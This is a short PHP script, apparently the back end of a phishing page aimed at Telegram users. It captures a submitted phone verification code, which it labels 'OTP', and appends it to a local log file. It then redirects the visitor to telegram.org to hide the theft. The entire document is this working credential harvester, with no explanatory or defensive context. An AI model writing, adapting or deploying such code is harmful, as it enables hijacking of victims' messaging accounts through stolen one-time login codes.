1<?php 2 3 file_put_contents("log.txt", "OTP: " . $_POST['phone_code'] . "\n", FILE_APPEND); 4header('Location: https://telegram.org'); 5exit(); 6